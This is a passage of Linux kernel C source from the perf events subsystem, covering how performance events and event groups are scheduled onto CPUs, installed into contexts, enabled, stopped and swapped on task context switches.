* within the time time source all along. We believe it
* is cleaner and simpler to understand.
*/
if (is_cgroup_event(event))
perf_cgroup_set_shadow_time(event, tstamp);
else
event->shadow_ctx_time = tstamp - ctx->timestamp;
}
#define MAX_INTERRUPTS (~0ULL)
static void perf_log_throttle(struct perf_event *event, int enable);
static void perf_log_itrace_start(struct perf_event *event);
static int
event_sched_in(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
u64 tstamp = perf_event_time(event);
int ret = 0;
lockdep_assert_held(&ctx->lock);
if (event->state <= PERF_EVENT_STATE_OFF)
return 0;
WRITE_ONCE(event->oncpu, smp_processor_id());
/*
* Order event::oncpu write to happen before the ACTIVE state
* is visible.
*/
smp_wmb();
WRITE_ONCE(event->state, PERF_EVENT_STATE_ACTIVE);
/*
* Unthrottle events, since we scheduled we might have missed several
* ticks already, also for a heavily scheduling task there is little
* guarantee it'll get a tick in a timely manner.
*/
if (unlikely(event->hw.interrupts == MAX_INTERRUPTS)) {
perf_log_throttle(event, 1);
event->hw.interrupts = 0;
}
/*
* The new state must be visible before we turn it on in the hardware:
*/
smp_wmb();
perf_pmu_disable(event->pmu);
perf_set_shadow_time(event, ctx, tstamp);
perf_log_itrace_start(event);
if (event->pmu->add(event, PERF_EF_START)) {
event->state = PERF_EVENT_STATE_INACTIVE;
event->oncpu = -1;
ret = -EAGAIN;
goto out;
}
event->tstamp_running += tstamp - event->tstamp_stopped;
if (!is_software_event(event))
cpuctx->active_oncpu++;
if (!ctx->nr_active++)
perf_event_ctx_activate(ctx);
if (event->attr.freq && event->attr.sample_freq)
ctx->nr_freq++;
if (event->attr.exclusive)
cpuctx->exclusive = 1;
out:
perf_pmu_enable(event->pmu);
return ret;
}
static int
group_sched_in(struct perf_event *group_event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
struct perf_event *event, *partial_group = NULL;
struct pmu *pmu = ctx->pmu;
u64 now = ctx->time;
bool simulate = false;
if (group_event->state == PERF_EVENT_STATE_OFF)
return 0;
pmu->start_txn(pmu, PERF_PMU_TXN_ADD);
if (event_sched_in(group_event, cpuctx, ctx)) {
pmu->cancel_txn(pmu);
perf_mux_hrtimer_restart(cpuctx);
return -EAGAIN;
}
/*
* Schedule in siblings as one group (if any):
*/
list_for_each_entry(event, &group_event->sibling_list, group_entry) {
if (event_sched_in(event, cpuctx, ctx)) {
partial_group = event;
goto group_error;
}
}
if (!pmu->commit_txn(pmu))
return 0;
group_error:
/*
* Groups can be scheduled in as one unit only, so undo any
* partial group before returning:
* The events up to the failed event are scheduled out normally,
* tstamp_stopped will be updated.
*
* The failed events and the remaining siblings need to have
* their timings updated as if they had gone thru event_sched_in()
* and event_sched_out(). This is required to get consistent timings
* across the group. This also takes care of the case where the group
* could never be scheduled by ensuring tstamp_stopped is set to mark
* the time the event was actually stopped, such that time delta
* calculation in update_event_times() is correct.
*/
list_for_each_entry(event, &group_event->sibling_list, group_entry) {
if (event == partial_group)
simulate = true;
if (simulate) {
event->tstamp_running += now - event->tstamp_stopped;
event->tstamp_stopped = now;
} else {
event_sched_out(event, cpuctx, ctx);
}
}
event_sched_out(group_event, cpuctx, ctx);
pmu->cancel_txn(pmu);
perf_mux_hrtimer_restart(cpuctx);
return -EAGAIN;
}
/*
* Work out whether we can put this event group on the CPU now.
*/
static int group_can_go_on(struct perf_event *event,
struct perf_cpu_context *cpuctx,
int can_add_hw)
{
/*
* Groups consisting entirely of software events can always go on.
*/
if (event->group_caps & PERF_EV_CAP_SOFTWARE)
return 1;
/*
* If an exclusive group is already on, no other hardware
* events can go on.
*/
if (cpuctx->exclusive)
return 0;
/*
* If this group is exclusive and there are already
* events on the CPU, it can't go on.
*/
if (event->attr.exclusive && cpuctx->active_oncpu)
return 0;
/*
* Otherwise, try to add it if all previous groups were able
* to go on.
*/
return can_add_hw;
}
static void add_event_to_ctx(struct perf_event *event,
struct perf_event_context *ctx)
{
u64 tstamp = perf_event_time(event);
list_add_event(event, ctx);
perf_group_attach(event);
event->tstamp_enabled = tstamp;
event->tstamp_running = tstamp;
event->tstamp_stopped = tstamp;
}
static void ctx_sched_out(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type);
static void
ctx_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task);
static void task_ctx_sched_out(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
enum event_type_t event_type)
{
if (!cpuctx->task_ctx)
return;
if (WARN_ON_ONCE(ctx != cpuctx->task_ctx))
return;
ctx_sched_out(ctx, cpuctx, event_type);
}
static void perf_event_sched_in(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
struct task_struct *task)
{
cpu_ctx_sched_in(cpuctx, EVENT_PINNED, task);
if (ctx)
ctx_sched_in(ctx, cpuctx, EVENT_PINNED, task);
cpu_ctx_sched_in(cpuctx, EVENT_FLEXIBLE, task);
if (ctx)
ctx_sched_in(ctx, cpuctx, EVENT_FLEXIBLE, task);
}
/*
* We want to maintain the following priority of scheduling:
* - CPU pinned (EVENT_CPU | EVENT_PINNED)
* - task pinned (EVENT_PINNED)
* - CPU flexible (EVENT_CPU | EVENT_FLEXIBLE)
* - task flexible (EVENT_FLEXIBLE).
*
* In order to avoid unscheduling and scheduling back in everything every
* time an event is added, only do it for the groups of equal priority and
* below.
*
* This can be called after a batch operation on task events, in which case
* event_type is a bit mask of the types of events involved. For CPU events,
* event_type is only either EVENT_PINNED or EVENT_FLEXIBLE.
*/
static void ctx_resched(struct perf_cpu_context *cpuctx,
struct perf_event_context *task_ctx,
enum event_type_t event_type)
{
enum event_type_t ctx_event_type = event_type & EVENT_ALL;
bool cpu_event = !!(event_type & EVENT_CPU);
/*
* If pinned groups are involved, flexible groups also need to be
* scheduled out.
*/
if (event_type & EVENT_PINNED)
event_type |= EVENT_FLEXIBLE;
perf_pmu_disable(cpuctx->ctx.pmu);
if (task_ctx)
task_ctx_sched_out(cpuctx, task_ctx, event_type);
/*
* Decide which cpu ctx groups to schedule out based on the types
* of events that caused rescheduling:
* - EVENT_CPU: schedule out corresponding groups;
* - EVENT_PINNED task events: schedule out EVENT_FLEXIBLE groups;
* - otherwise, do nothing more.
*/
if (cpu_event)
cpu_ctx_sched_out(cpuctx, ctx_event_type);
else if (ctx_event_type & EVENT_PINNED)
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, task_ctx, current);
perf_pmu_enable(cpuctx->ctx.pmu);
}
/*
* Cross CPU call to install and enable a performance event
*
* Very similar to remote_function() + event_function() but cannot assume that
* things like ctx->is_active and cpuctx->task_ctx are set.
*/
static int __perf_install_in_context(void *info)
{
struct perf_event *event = info;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct perf_event_context *task_ctx = cpuctx->task_ctx;
bool reprogram = true;
int ret = 0;
raw_spin_lock(&cpuctx->ctx.lock);
if (ctx->task) {
raw_spin_lock(&ctx->lock);
task_ctx = ctx;
reprogram = (ctx->task == current);
/*
* If the task is running, it must be running on this CPU,
* otherwise we cannot reprogram things.
*
* If its not running, we don't care, ctx->lock will
* serialize against it becoming runnable.
*/
if (task_curr(ctx->task) && !reprogram) {
ret = -ESRCH;
goto unlock;
}
WARN_ON_ONCE(reprogram && cpuctx->task_ctx && cpuctx->task_ctx != ctx);
} else if (task_ctx) {
raw_spin_lock(&task_ctx->lock);
}
if (reprogram) {
ctx_sched_out(ctx, cpuctx, EVENT_TIME);
add_event_to_ctx(event, ctx);
ctx_resched(cpuctx, task_ctx, get_event_type(event));
} else {
add_event_to_ctx(event, ctx);
}
unlock:
perf_ctx_unlock(cpuctx, task_ctx);
return ret;
}
/*
* Attach a performance event to a context.
*
* Very similar to event_function_call, see comment there.
*/
static void
perf_install_in_context(struct perf_event_context *ctx,
struct perf_event *event,
int cpu)
{
struct task_struct *task = READ_ONCE(ctx->task);
lockdep_assert_held(&ctx->mutex);
if (event->cpu != -1)
event->cpu = cpu;
/*
* Ensures that if we can observe event->ctx, both the event and ctx
* will be 'complete'. See perf_iterate_sb_cpu().
*/
smp_store_release(&event->ctx, ctx);
if (!task) {
cpu_function_call(cpu, __perf_install_in_context, event);
return;
}
/*
* Should not happen, we validate the ctx is still alive before calling.
*/
if (WARN_ON_ONCE(task == TASK_TOMBSTONE))
return;
/*
* Installing events is tricky because we cannot rely on ctx->is_active
* to be set in case this is the nr_events 0 -> 1 transition.
*
* Instead we use task_curr(), which tells us if the task is running.
* However, since we use task_curr() outside of rq::lock, we can race
* against the actual state. This means the result can be wrong.
*
* If we get a false positive, we retry, this is harmless.
*
* If we get a false negative, things are complicated. If we are after
* perf_event_context_sched_in() ctx::lock will serialize us, and the
* value must be correct. If we're before, it doesn't matter since
* perf_event_context_sched_in() will program the counter.
*
* However, this hinges on the remote context switch having observed
* our task->perf_event_ctxp[] store, such that it will in fact take
* ctx::lock in perf_event_context_sched_in().
*
* We do this by task_function_call(), if the IPI fails to hit the task
* we know any future context switch of task must see the
* perf_event_ctpx[] store.
*/
/*
* This smp_mb() orders the task->perf_event_ctxp[] store with the
* task_cpu() load, such that if the IPI then does not find the task
* running, a future context switch of that task must observe the
* store.
*/
smp_mb();
again:
if (!task_function_call(task, __perf_install_in_context, event))
return;
raw_spin_lock_irq(&ctx->lock);
task = ctx->task;
if (WARN_ON_ONCE(task == TASK_TOMBSTONE)) {
/*
* Cannot happen because we already checked above (which also
* cannot happen), and we hold ctx->mutex, which serializes us
* against perf_event_exit_task_context().
*/
raw_spin_unlock_irq(&ctx->lock);
return;
}
/*
* If the task is not running, ctx->lock will avoid it becoming so,
* thus we can safely install the event.
*/
if (task_curr(task)) {
raw_spin_unlock_irq(&ctx->lock);
goto again;
}
add_event_to_ctx(event, ctx);
raw_spin_unlock_irq(&ctx->lock);
}
/*
* Put a event into inactive state and update time fields.
* Enabling the leader of a group effectively enables all
* the group members that aren't explicitly disabled, so we
* have to update their ->tstamp_enabled also.
* Note: this works for group members as well as group leaders
* since the non-leader members' sibling_lists will be empty.
*/
static void __perf_event_mark_enabled(struct perf_event *event)
{
struct perf_event *sub;
u64 tstamp = perf_event_time(event);
event->state = PERF_EVENT_STATE_INACTIVE;
event->tstamp_enabled = tstamp - event->total_time_enabled;
list_for_each_entry(sub, &event->sibling_list, group_entry) {
if (sub->state >= PERF_EVENT_STATE_INACTIVE)
sub->tstamp_enabled = tstamp - sub->total_time_enabled;
}
}
/*
* Cross CPU call to enable a performance event
*/
static void __perf_event_enable(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
struct perf_event *leader = event->group_leader;
struct perf_event_context *task_ctx;
if (event->state >= PERF_EVENT_STATE_INACTIVE ||
event->state <= PERF_EVENT_STATE_ERROR)
return;
if (ctx->is_active)
ctx_sched_out(ctx, cpuctx, EVENT_TIME);
__perf_event_mark_enabled(event);
if (!ctx->is_active)
return;
if (!event_filter_match(event)) {
if (is_cgroup_event(event))
perf_cgroup_defer_enabled(event);
ctx_sched_in(ctx, cpuctx, EVENT_TIME, current);
return;
}
/*
* If the event is in a group and isn't the group leader,
* then don't put it on unless the group is on.
*/
if (leader != event && leader->state != PERF_EVENT_STATE_ACTIVE) {
ctx_sched_in(ctx, cpuctx, EVENT_TIME, current);
return;
}
task_ctx = cpuctx->task_ctx;
if (ctx->task)
WARN_ON_ONCE(task_ctx != ctx);
ctx_resched(cpuctx, task_ctx, get_event_type(event));
}
/*
* Enable a event.
*
* If event->ctx is a cloned context, callers must make sure that
* every task struct that event->ctx->task could possibly point to
* remains valid. This condition is satisfied when called through
* perf_event_for_each_child or perf_event_for_each as described
* for perf_event_disable.
*/
static void _perf_event_enable(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
raw_spin_lock_irq(&ctx->lock);
if (event->state >= PERF_EVENT_STATE_INACTIVE ||
event->state < PERF_EVENT_STATE_ERROR) {
raw_spin_unlock_irq(&ctx->lock);
return;
}
/*
* If the event is in error state, clear that first.
*
* That way, if we see the event in error state below, we know that it
* has gone back into error state, as distinct from the task having
* been scheduled away before the cross-call arrived.
*/
if (event->state == PERF_EVENT_STATE_ERROR)
event->state = PERF_EVENT_STATE_OFF;
raw_spin_unlock_irq(&ctx->lock);
event_function_call(event, __perf_event_enable, NULL);
}
/*
* See perf_event_disable();
*/
void perf_event_enable(struct perf_event *event)
{
struct perf_event_context *ctx;
ctx = perf_event_ctx_lock(event);
_perf_event_enable(event);
perf_event_ctx_unlock(event, ctx);
}
EXPORT_SYMBOL_GPL(perf_event_enable);
struct stop_event_data {
struct perf_event *event;
unsigned int restart;
};
static int __perf_event_stop(void *info)
{
struct stop_event_data *sd = info;
struct perf_event *event = sd->event;
/* if it's already INACTIVE, do nothing */
if (READ_ONCE(event->state) != PERF_EVENT_STATE_ACTIVE)
return 0;
/* matches smp_wmb() in event_sched_in() */
smp_rmb();
/*
* There is a window with interrupts enabled before we get here,
* so we need to check again lest we try to stop another CPU's event.
*/
if (READ_ONCE(event->oncpu) != smp_processor_id())
return -EAGAIN;
event->pmu->stop(event, PERF_EF_UPDATE);
/*
* May race with the actual stop (through perf_pmu_output_stop()),
* but it is only used for events with AUX ring buffer, and such
* events will refuse to restart because of rb::aux_mmap_count==0,
* see comments in perf_aux_output_begin().
*
* Since this is happening on a event-local CPU, no trace is lost
* while restarting.
*/
if (sd->restart)
event->pmu->start(event, 0);
return 0;
}
static int perf_event_stop(struct perf_event *event, int restart)
{
struct stop_event_data sd = {
.event = event,
.restart = restart,
};
int ret = 0;
do {
if (READ_ONCE(event->state) != PERF_EVENT_STATE_ACTIVE)
return 0;
/* matches smp_wmb() in event_sched_in() */
smp_rmb();
/*
* We only want to restart ACTIVE events, so if the event goes
* inactive here (event->oncpu==-1), there's nothing more to do;
* fall through with ret==-ENXIO.
*/
ret = cpu_function_call(READ_ONCE(event->oncpu),
__perf_event_stop, &sd);
} while (ret == -EAGAIN);
return ret;
}
/*
* In order to contain the amount of racy and tricky in the address filter
* configuration management, it is a two part process:
*
* (p1) when userspace mappings change as a result of (1) or (2) or (3) below,
* we update the addresses of corresponding vmas in
* event::addr_filters_offs array and bump the event::addr_filters_gen;
* (p2) when an event is scheduled in (pmu::add), it calls
* perf_event_addr_filters_sync() which calls pmu::addr_filters_sync()
* if the generation has changed since the previous call.
*
* If (p1) happens while the event is active, we restart it to force (p2).
*
* (1) perf_addr_filters_apply(): adjusting filters' offsets based on
* pre-existing mappings, called once when new filters arrive via SET_FILTER
* ioctl;
* (2) perf_addr_filters_adjust(): adjusting filters' offsets based on newly
* registered mapping, called for every new mmap(), with mm::mmap_sem down
* for reading;
* (3) perf_event_addr_filters_exec(): clearing filters' offsets in the process
* of exec.
*/
void perf_event_addr_filters_sync(struct perf_event *event)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
if (!has_addr_filter(event))
return;
raw_spin_lock(&ifh->lock);
if (event->addr_filters_gen != event->hw.addr_filters_gen) {
event->pmu->addr_filters_sync(event);
event->hw.addr_filters_gen = event->addr_filters_gen;
}
raw_spin_unlock(&ifh->lock);
}
EXPORT_SYMBOL_GPL(perf_event_addr_filters_sync);
static int _perf_event_refresh(struct perf_event *event, int refresh)
{
/*
* not supported on inherited events
*/
if (event->attr.inherit || !is_sampling_event(event))
return -EINVAL;
atomic_add(refresh, &event->event_limit);
_perf_event_enable(event);
return 0;
}
/*
* See perf_event_disable()
*/
int perf_event_refresh(struct perf_event *event, int refresh)
{
struct perf_event_context *ctx;
int ret;
ctx = perf_event_ctx_lock(event);
ret = _perf_event_refresh(event, refresh);
perf_event_ctx_unlock(event, ctx);
return ret;
}
EXPORT_SYMBOL_GPL(perf_event_refresh);
static void ctx_sched_out(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type)
{
int is_active = ctx->is_active;
struct perf_event *event;
lockdep_assert_held(&ctx->lock);
if (likely(!ctx->nr_events)) {
/*
* See __perf_remove_from_context().
*/
WARN_ON_ONCE(ctx->is_active);
if (ctx->task)
WARN_ON_ONCE(cpuctx->task_ctx);
return;
}
ctx->is_active &= ~event_type;
if (!(ctx->is_active & EVENT_ALL))
ctx->is_active = 0;
if (ctx->task) {
WARN_ON_ONCE(cpuctx->task_ctx != ctx);
if (!ctx->is_active)
cpuctx->task_ctx = NULL;
}
/*
* Always update time if it was set; not only when it changes.
* Otherwise we can 'forget' to update time for any but the last
* context we sched out. For example:
*
* ctx_sched_out(.event_type = EVENT_FLEXIBLE)
* ctx_sched_out(.event_type = EVENT_PINNED)
*
* would only update time for the pinned events.
*/
if (is_active & EVENT_TIME) {
/* update (and stop) ctx time */
update_context_time(ctx);
update_cgrp_time_from_cpuctx(cpuctx);
}
is_active ^= ctx->is_active; /* changed bits */
if (!ctx->nr_active || !(is_active & EVENT_ALL))
return;
perf_pmu_disable(ctx->pmu);
if (is_active & EVENT_PINNED) {
list_for_each_entry(event, &ctx->pinned_groups, group_entry)
group_sched_out(event, cpuctx, ctx);
}
if (is_active & EVENT_FLEXIBLE) {
list_for_each_entry(event, &ctx->flexible_groups, group_entry)
group_sched_out(event, cpuctx, ctx);
}
perf_pmu_enable(ctx->pmu);
}
/*
* Test whether two contexts are equivalent, i.e. whether they have both been
* cloned from the same version of the same context.
*
* Equivalence is measured using a generation number in the context that is
* incremented on each modification to it; see unclone_ctx(), list_add_event()
* and list_del_event().
*/
static int context_equiv(struct perf_event_context *ctx1,
struct perf_event_context *ctx2)
{
lockdep_assert_held(&ctx1->lock);
lockdep_assert_held(&ctx2->lock);
/* Pinning disables the swap optimization */
if (ctx1->pin_count || ctx2->pin_count)
return 0;
/* If ctx1 is the parent of ctx2 */
if (ctx1 == ctx2->parent_ctx && ctx1->generation == ctx2->parent_gen)
return 1;
/* If ctx2 is the parent of ctx1 */
if (ctx1->parent_ctx == ctx2 && ctx1->parent_gen == ctx2->generation)
return 1;
/*
* If ctx1 and ctx2 have the same parent; we flatten the parent
* hierarchy, see perf_event_init_context().
*/
if (ctx1->parent_ctx && ctx1->parent_ctx == ctx2->parent_ctx &&
ctx1->parent_gen == ctx2->parent_gen)
return 1;
/* Unmatched */
return 0;
}
static void __perf_event_sync_stat(struct perf_event *event,
struct perf_event *next_event)
{
u64 value;
if (!event->attr.inherit_stat)
return;
/*
* Update the event value, we cannot use perf_event_read()
* because we're in the middle of a context switch and have IRQs
* disabled, which upsets smp_call_function_single(), however
* we know the event must be on the current CPU, therefore we
* don't need to use it.
*/
switch (event->state) {
case PERF_EVENT_STATE_ACTIVE:
event->pmu->read(event);
/* fall-through */
case PERF_EVENT_STATE_INACTIVE:
update_event_times(event);
break;
default:
break;
}
/*
* In order to keep per-task stats reliable we need to flip the event
* values when we flip the contexts.
*/
value = local64_read(&next_event->count);
value = local64_xchg(&event->count, value);
local64_set(&next_event->count, value);
swap(event->total_time_enabled, next_event->total_time_enabled);
swap(event->total_time_running, next_event->total_time_running);
/*
* Since we swizzled the values, update the user visible data too.
*/
perf_event_update_userpage(event);
perf_event_update_userpage(next_event);
}
static void perf_event_sync_stat(struct perf_event_context *ctx,
struct perf_event_context *next_ctx)
{
struct perf_event *event, *next_event;
if (!ctx->nr_stat)
return;
update_context_time(ctx);
event = list_first_entry(&ctx->event_list,
struct perf_event, event_entry);
next_event = list_first_entry(&next_ctx->event_list,
struct perf_event, event_entry);
while (&event->event_entry != &ctx->event_list &&
&next_event->event_entry != &next_ctx->event_list) {
__perf_event_sync_stat(event, next_event);
event = list_next_entry(event, event_entry);
next_event = list_next_entry(next_event, event_entry);
}
}
static void perf_event_context_sched_out(struct task_struct *task, int ctxn,
struct task_struct *next)
{
struct perf_event_context *ctx = task->perf_event_ctxp[ctxn];
struct perf_event_context *next_ctx;
struct perf_event_context *parent, *next_parent;
struct perf_cpu_context *cpuctx;
int do_switch = 1;
if (likely(!ctx))
return;
cpuctx = __get_cpu_context(ctx);
if (!cpuctx->task_ctx)
return;
rcu_read_lock();
next_ctx = next->perf_event_ctxp[ctxn];
if (!next_ctx)
goto unlock;
parent = rcu_dereference(ctx->parent_ctx);
next_parent = rcu_dereference(next_ctx->parent_ctx);
/* If neither context have a parent context; they cannot be clones. */
if (!parent && !next_parent)
goto unlock;
if (next_parent == ctx || next_ctx == parent || next_parent == parent) {
/*
* Looks like the two contexts are clones, so we might be
* able to optimize the context switch. We lock both
* contexts and check that they are clones under the
* lock (including re-checking that neither has been
* uncloned in the meantime). It doesn't matter which
* order we take the locks because no other cpu could
* be trying to lock both of these tasks.
*/
raw_spin_lock(&ctx->lock);
raw_spin_lock_nested(&next_ctx->lock, SINGLE_DEPTH_NESTING);
if (context_equiv(ctx, next_ctx)) {
WRITE_ONCE(ctx->task, next);
WRITE_ONCE(next_ctx->task, task);
swap(ctx->task_ctx_data, next_ctx->task_ctx_data);
/*
* RCU_INIT_POINTER here is safe because we've not
* modified the ctx and the above modification of
* ctx->task and ctx->task_ctx_data are immaterial
* since those values are always verified under
* ctx->lock which we're now holding.
*/
RCU_INIT_POINTER(task->perf_event_ctxp[ctxn], next_ctx);
RCU_INIT_POINTER(next->perf_event_ctxp[ctxn], ctx);
do_switch = 0;
perf_event_sync_stat(ctx, next_ctx);
}
raw_spin_unlock(&next_ctx->lock);
raw_spin_unlock(&ctx->lock);
}
unlock:
rcu_read_unlock();
if (do_switch) {
raw_spin_lock(&ctx->lock);
task_ctx_sched_out(cpuctx, ctx, EVENT_ALL);
raw_spin_unlock(&ctx->lock);
}
}
static DEFINE_PER_CPU(struct list_head, sched_cb_list);
void perf_sched_cb_dec(struct pmu *pmu)
{
struct perf_cpu_context *cpuctx = this_cpu_ptr(pmu->pmu_cpu_context);
this_cpu_dec(perf_sched_cb_usages);
if (!--cpuctx->sched_cb_usage)
list_del(&cpuctx->sched_cb_entry);
}
void perf_sched_cb_inc(struct pmu *pmu)
{
struct perf_cpu_context *cpuctx = this_cpu_ptr(pmu->pmu_cpu_context);
if (!cpuctx->sched_cb_usage++)
list_add(&cpuctx->sched_cb_entry, this_cpu_ptr(&sched_cb_list));
this_cpu_inc(perf_sched_cb_usages);
}
/*
* This function provides the context switch callback to the lower code
* layer. It is invoked ONLY when the context switch callback is enabled.
*
* This callback is relevant even to per-cpu events; for example multi event
* PEBS requires this to provide PID/TID information. This requires we flush
* all queued PEBS records before we context switch to a new task.
*/
static void perf_pmu_sched_task(struct task_struct *prev,
struct task_struct *next,
bool sched_in)
{
struct perf_cpu_context *cpuctx;
struct pmu *pmu;
if (prev == next)
return;
list_for_each_entry(cpuctx, this_cpu_ptr(&sched_cb_list), sched_cb_entry) {
pmu = cpuctx->ctx.pmu; /* software PMUs will not have sched_task */
if (WARN_ON_ONCE(!pmu->sched_task))
continue;
perf_ctx_lock(cpuctx, cpuctx->task_ctx);
perf_pmu_disable(pmu);
pmu->sched_task(cpuctx->task_ctx, sched_in);
perf_pmu_enable(pmu);
perf_ctx_unlock(cpuctx, cpuctx->task_ctx);
}
}
static void perf_event_switch(struct task_struct *task,
struct task_struct *next_prev, bool sched_in);
#define for_each_task_context_nr(ctxn) \
for ((ctxn) = 0; (ctxn) < perf_nr_task_contexts; (ctxn)++)
/*
* Called from scheduler to remove the events of the current task,
* with interrupts disabled.
*
* We stop each event and update the event value in event->count.
*
* This does not protect us against NMI, but disable()
* sets the disabled bit in the control field of event _before_
* accessing the event control register. If a NMI hits, then it will
* not restart the event.
*/
void __perf_event_task_sched_out(struct task_struct *task,
struct task_struct *next)
{
int ctxn;
if (__this_cpu_read(perf_sched_cb_usages))
perf_pmu_sched_task(task, next, false);
if (atomic_read(&nr_switch_events))
perf_event_switch(task, next, false);
for_each_task_context_nr(ctxn)
perf_event_context_sched_out(task, ctxn, next);
/*
* if cgroup events exist on this CPU, then we need
* to check if we have to switch out PMU state.
* cgroup event are system-wide mode only
*/
if (atomic_read(this_cpu_ptr(&perf_cgroup_events)))
perf_cgroup_sched_out(task, next);
}
/*
* Called with IRQs disabled
*/
static void cpu_ctx_sched_out(struct perf_cpu_context *cpuctx,
enum event_type_t event_type)
{
ctx_sched_out(&cpuctx->ctx, cpuctx, event_type);
}
static void
ctx_pinned_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx)
{
struct perf_event *event;
list_for_each_entry(event, &ctx->pinned_groups, group_entry) {
if (event->state <= PERF_EVENT_STATE_OFF)
continue;
if (!event_filter_match(event))
continue;
/* may need to reset tstamp_enabled */
if (is_cgroup_event(event))
perf_cgroup_mark_enabled(event, ctx);
if (group_can_go_on(event, cpuctx, 1))
group_sched_in(event, cpuctx, ctx);
/*
* If this pinned group hasn't been scheduled,
* put it in error state.
*/
if (event->state == PERF_EVENT_STATE_INACTIVE) {
update_group_times(event);
event->state = PERF_EVENT_STATE_ERROR;
}
}
}
static void
ctx_flexible_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx)
{
struct perf_event *event;
int can_add_hw = 1;
list_for_each_entry(event, &ctx->flexible_groups, group_entry) {
/* Ignore events in OFF or ERROR state */
if (event->state <= PERF_EVENT_STATE_OFF)
continue;
/*
* Listen to the 'cpu' scheduling filter constraint
* of events:
*/
if (!event_filter_match(event))
continue;
/* may need to reset tstamp_enabled */
if (is_cgroup_event(event))
perf_cgroup_mark_enabled(event, ctx);
if (group_can_go_on(event, cpuctx, can_add_hw)) {
if (group_sched_in(event, cpuctx, ctx))
can_add_hw = 0;
}
}
}
static void
ctx_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task)
{
int is_active = ctx->is_active;
u64 now;
lockdep_assert_held(&ctx->lock);
if (likely(!ctx->nr_events))
return;
ctx->is_active |= (event_type | EVENT_TIME);
if (ctx->task) {
if (!is_active)
cpuctx->task_ctx = ctx;
else
WARN_ON_ONCE(cpuctx->task_ctx != ctx);
}
is_active ^= ctx->is_active; /* changed bits */
if (is_active & EVENT_TIME) {
/* start ctx time */
now = perf_clock();
ctx->timestamp = now;
perf_cgroup_set_timestamp(task, ctx);
}
/*
* First go through the list and put on any pinned groups
* in order to give them the best chance of going on.
*/
if (is_active & EVENT_PINNED)
ctx_pinned_sched_in(ctx, cpuctx);
/* Then walk through the lower prio flexible groups */
if (is_active & EVENT_FLEXIBLE)
ctx_flexible_sched_in(ctx, cpuctx);
}
static void cpu_ctx_sched_in(struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task)
{
struct perf_event_context *ctx = &cpuctx->ctx;
ctx_sched_in(ctx, cpuctx, event_type, task);
}
static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
/*
* We want to keep the following priority order:
* cpu pinned (that don't need to move), task pinned,
* cpu flexible, task flexible.
*
* However, if task's ctx is not carrying any pinned
* events, no need to flip the cpuctx's events around.
*/
if (!list_empty(&ctx->pinned_groups))
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
perf_ctx_unlock(cpuctx, ctx);
}
/*
* Called from scheduler to add the events of the current task
* with interrupts disabled.
*
* We restore the event value and then enable it.
*
* This does not protect us against NMI, but enable()
* sets the enabled bit in the control field of event _before_
* accessing the event control register. If a NMI hits, then it will
* keep the event running.
*/
void __perf_event_task_sched_in(struct task_struct *prev,
struct task_struct *task)
{
struct perf_event_context *ctx;
int ctxn;
/*
* If cgroup events exist on this CPU, then we need to check if we have
* to switch in PMU state; cgroup event are system-wide mode only.
*
* Since cgroup events are CPU events, we must schedule these in before
* we schedule in the task events.
*/
if (atomic_read(this_cpu_ptr(&perf_cgroup_events)))
perf_cgroup_sched_in(prev, task);
for_each_task_context_nr(ctxn) {
ctx = task->perf_event_ctxp[ctxn];
if (likely(!ctx))
continue;
perf_event_context_sched_in(ctx, task);
}
if (atomic_read(&nr_switch_events))
perf_event_switch(task, prev, true);
if (__this_cpu_read(perf_sched_cb_usages))
perf_pmu_sched_task(prev, task, true);
}
static u64 perf_calculate_period(struct perf_event *event, u64 nsec, u64 count)
{
u64 frequency = event->attr.sample_freq;
u64 sec = NSEC_PER_SEC;
u64 divisor, dividend;
int count_fls, nsec_fls, frequency_fls, sec_fls;
count_fls = fls64(count);
nsec_fls = fls64(nsec);
frequency_fls = fls64(frequency);
sec_fls = 30;
/*
* We got @count in @nsec, with a target of sample_freq HZ
* the target period becomes:
*
* @count * 10^9
* period = -------------------
* @nsec * sample_freq
*
*/
/*
* Reduce accuracy by one bit such that @a and @b converge
* to a similar magnitude.
*/
#define REDUCE_FLS(a, b) \
do { \
if (a##_fls > b##_fls) { \
a >>= 1; \
a##_fls--; \
} else { \
b >>= 1; \
b##_fls--; \
} \
} while (0)
/*
* Reduce accuracy until either term fits in a u64, then proceed with
* the other, so that finally we can do a u64/u64 division.
*/
while (count_fls + sec_fls > 64 && nsec_fls + frequency_fls > 64) {
REDUCE_FLS(nsec, frequency);
REDUCE_FLS(sec, count);
}
if (count_fls + sec_fls > 64) {
divisor = nsec * frequency;
while (count_fls + sec_fls > 64) {
REDUCE_FLS(count, sec);
divisor >>= 1;
}
dividend = count * sec;
} else {
dividend = count * sec;
while (nsec_fls + frequency_fls > 64) {
REDUCE_FLS(nsec, frequency);
dividend >>= 1;
}
divisor = nsec * frequency;
}
if (!divisor)
return dividend;
return div64_u64(dividend, divisor);
}
static DEFINE_PER_CPU(int, perf_throttled_count);
